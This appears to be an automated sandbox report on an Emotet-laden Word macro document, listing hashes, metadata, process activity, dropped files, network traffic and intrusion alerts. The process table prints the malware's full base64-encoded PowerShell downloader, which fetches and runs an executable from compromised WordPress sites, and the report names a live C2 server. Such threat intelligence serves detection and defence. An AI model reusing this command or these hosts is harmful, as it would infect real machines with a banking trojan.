analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

PLIK_492_DJF_14_10_2019.doc

Full analysis: https://app.any.run/tasks/e7668afc-96ae-41a3-8c5a-38b4d7426cf5
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 14, 2019, 21:40:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
trojan
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Program, Subject: Rustic Frozen Chair, Author: Hailee Stracke, Keywords: National, Comments: synergize, Template: Normal.dotm, Last Saved By: Ryann Auer, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 06:52:00 2019, Last Saved Time/Date: Mon Oct 14 06:52:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0
MD5:

809387E635CC58FD42E0B311EBCF6A7F

SHA1:

EE34D74CE83A7E789089689D2C5E18078DA597CB

SHA256:

ECE6CAFC7D33FF5C5E1088557D6910BF1CA80076C9C7380F677179AE4C87FE91

SSDEEP:

6144:Tg39prWKUzSFnLx30hvbrptZI141ekKGQ2:Tg39prrUGFt3M3TZ5ej

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 949.exe (PID: 3720)
      • 949.exe (PID: 3032)
      • msptermsizes.exe (PID: 1576)
      • msptermsizes.exe (PID: 3476)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2828)
    • Emotet process was detected

      • 949.exe (PID: 3720)
    • EMOTET was detected

      • msptermsizes.exe (PID: 1576)
    • Connects to CnC server

      • msptermsizes.exe (PID: 1576)
    • Changes the autorun value in the registry

      • msptermsizes.exe (PID: 1576)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 2828)
    • Creates files in the user directory

      • powershell.exe (PID: 2828)
    • Executed via WMI

      • powershell.exe (PID: 2828)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2828)
      • 949.exe (PID: 3720)
    • Connects to server without host name

      • msptermsizes.exe (PID: 1576)
    • Starts itself from another location

      • 949.exe (PID: 3720)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 392)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 392)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Program
Subject: Rustic Frozen Chair
Author: Hailee Stracke
Keywords: National
Comments: synergize
Template: Normal.dotm
LastModifiedBy: Ryann Auer
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:10:14 05:52:00
ModifyDate: 2019:10:14 05:52:00
Pages: 1
Words: 30
Characters: 172
Security: None
CodePage: Windows Latin 1 (Western European)
Company: O'Reilly, Collins and Stoltenberg
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 201
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Sporer
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 949.exe no specs #EMOTET 949.exe msptermsizes.exe no specs #EMOTET msptermsizes.exe

Process information

PID
CMD
Path
Indicators
Parent process
392"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\PLIK_492_DJF_14_10_2019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2828powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABkAGUAMwA3ADkAOQA3AGUAMwBjADEAMAA1ADcAMQA9ACcAYQAwAHgAMwBmADgAYgBjADcAMAA3ADEAZAAwAGQAJwA7ACQAYQAwAHgAYgA3ADUANABhADQAMAAxAGUANwBmADkAYgA0ACAAPQAgACcAOQA0ADkAJwA7ACQAYQAwAHgANgBmADYAMwBlADAAZAA4ADIAMAA3ADAAZAAyAD0AJwBhADAAeAA3ADYAZgBkADgANQA4ADYAMQA2ADIAZgA4AGIAJwA7ACQAYQAwAHgAOAAyAGIAOABkAGMANABiADEANwAxAGMAMwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQAwAHgAYgA3ADUANABhADQAMAAxAGUANwBmADkAYgA0ACsAJwAuAGUAeABlACcAOwAkAGEAMAB4ADAANABiADAAZgAzADMAZgBlAGEAZAA9ACcAYQAwAHgAYgA5AGUANwA1ADYAYQBlADYAZgAnADsAJABhADAAeABjAGMANQBkADAANwAxADUAYQAxADIAZQA3AD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABhADAAeABiADAAZgAxADIAZQBmADgAZgBiADUAZgA9ACcAaAB0AHQAcAA6AC8ALwB0AGUAbgBkAGUAbgBjAGkAYQBzAHYALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADEAZAA5ADcAMgBhAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AYwBvAHIAcgBlAGwAYQB0AGkAbwBuAC4AYwBhAC8AZgBvAG4AdABzAC8ARgBTAEsAcgBZAE8AYwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AbwBuAGUAeQBoAGEAaQByAHAAYQByAHQAeQAuAGMAbwBtAC8AYwBsAGEAcwBzAC4AbABvAGMAYQBsAC8AcABhAHIAdABzAF8AcwBlAHIAdgBpAGMAZQAvAHMANAB5ADAALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAGkAdgBpAG4AZQBkAG8AbABsAHoAYwBvAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGcAcgBhAGQAZQAvAGsAYwBiAGcALwAqAGgAdAB0AHAAOgAvAC8AZABuAGMAdgBpAGUAdABuAGEAbQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANABiAHYANAB6ADcAdQAvACcALgAiAFMAYABwAEwAaQBUACIAKAAnACoAJwApADsAJABhADAAeAA3AGUAZABmADYAOQA3ADAAOQA3AGYAYwAzADIAMAA9ACcAYQAwAHgAOAAwADIANgBkADMAOAAzADUAYwAxAGEANABhADkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGEAMAB4ADAAZAAyAGMAOABlADMAMQA0AGEAMAAgAGkAbgAgACQAYQAwAHgAYgAwAGYAMQAyAGUAZgA4AGYAYgA1AGYAKQB7AHQAcgB5AHsAJABhADAAeABjAGMANQBkADAANwAxADUAYQAxADIAZQA3AC4AIgBkAG8AYAB3AGAATgBgAGwATwBBAGQARgBpAEwARQAiACgAJABhADAAeAAwAGQAMgBjADgAZQAzADEANABhADAALAAgACQAYQAwAHgAOAAyAGIAOABkAGMANABiADEANwAxAGMAMwApADsAJABhADAAeABiADAAMABhADcAZQBjAGIAZgA3ADgAOAAzAD0AJwBhADAAeAA3ADEAOAA3AGQAYgBhAGEANQBjACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAYQAwAHgAOAAyAGIAOABkAGMANABiADEANwAxAGMAMwApAC4AIgBsAEUAYABOAGcAdABoACIAIAAtAGcAZQAgADMANgA1ADkAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAFIAdAAiACgAJABhADAAeAA4ADIAYgA4AGQAYwA0AGIAMQA3ADEAYwAzACkAOwAkAGEAMAB4ADUAYwA1AGUAMQA3AGYAZAAzADEAPQAnAGEAMAB4AGEAZABjAGYAYgAyADUAMwAyADMAMgAxADEANgAxACcAOwBiAHIAZQBhAGsAOwAkAGEAMAB4AGUANgAxADcANQBhAGEAMgBhADEAZgBmAGEAZQA9ACcAYQAwAHgANwAwAGMAZAA1ADEAZQA3ADEAMwAyADkAMwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABhADAAeAA1ADgAMgA0AGEAZgBlADUAMwAxAGQAMQAwADYANAA9ACcAYQAwAHgAYQBiADkANQA0ADkANgBkADcAYQA1ADEAOAAxACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3032"C:\Users\admin\949.exe" C:\Users\admin\949.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3720--eced2e3cC:\Users\admin\949.exe
949.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3476"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe949.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1576--f91b2738C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
msptermsizes.exe
User:
admin
Integrity Level:
MEDIUM
Total events
2 226
Read events
1 403
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
392WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB9F4.tmp.cvr
MD5:
SHA256:
2828powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HIIKDA5HL0W9H8NXPNGW.temp
MD5:
SHA256:
392WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:4E246E3709D07917DB2651D445148209
SHA256:B4BC0257859A2EAF5A9284D8E9615527F453E5C003405773D38E5F920CE9DCA4
392WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD739850.wmfwmf
MD5:08ADEE98DF6947D72001106F908675CA
SHA256:586A74BE4C5B87AC89CA2169858EB11324CF664A6DC30F57BCD068E4CB05BE26
392WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:339D8CCD7F0F323DB8CC4FAE45364B3D
SHA256:62844C7FDB29483B850A832956640C2DC3334A1812DEDF41B3684FCA3D98F879
392WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$IK_492_DJF_14_10_2019.docpgc
MD5:DEB1255070AC8D13D122BCCC99A23E6A
SHA256:8298B87B30FA143F2FA1AA084867D1D4021787ABF88052C2E9FF2B3EE60D2EC1
392WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D5E9C11.wmfwmf
MD5:E9EA0224A0B59683F7F913B80FC4C68B
SHA256:96116C45AEAB440DC68095A682D4F2F7F81CD465B400FD6F847A03721BE80072
392WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5A729F83.wmfwmf
MD5:BE82C0B2E9DDC13A99722399EDECAB9F
SHA256:BD90E2D1EA95895271107D24D64A0BA308E08BEE4B30BD05F686302E6571C804
392WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D72B4BA8.wmfwmf
MD5:A4616A2FDC524508B824BCF370C9D3E3
SHA256:1CCCC7193E50615F06CB55492322A297EB13F4537EF3D665C6CB07B1031C6796
392WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3DA5B2DE.wmfwmf
MD5:0DCF9B68BD9D5C175BE77CD6FD15F1E8
SHA256:7F64E813A2A46E4BAC663D915259035213DAFBE1237C0DF2F8FDB42739E6E3DF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1576
msptermsizes.exe
POST
200
200.51.94.251:80
http://200.51.94.251/scripts/merge/
AR
binary
132 b
malicious
2828
powershell.exe
GET
200
149.56.222.236:80
http://tendenciasv.com/wp-admin/1d972a/
CA
executable
184 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1576
msptermsizes.exe
200.51.94.251:80
Telefonica de Argentina
AR
malicious
2828
powershell.exe
149.56.222.236:80
tendenciasv.com
OVH SAS
CA
suspicious

DNS requests

Domain
IP
Reputation
tendenciasv.com
  • 149.56.222.236
suspicious

Threats

PID
Process
Class
Message
2828
powershell.exe
A Network Trojan was detected
ET POLICY Terse Named Filename EXE Download - Possibly Hostile
2828
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2828
powershell.exe
A Network Trojan was detected
AV INFO Suspicious EXE download from WordPress folder
2828
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2828
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
1576
msptermsizes.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 15
1576
msptermsizes.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
1576
msptermsizes.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2 ETPRO signatures available at the full report
No debug info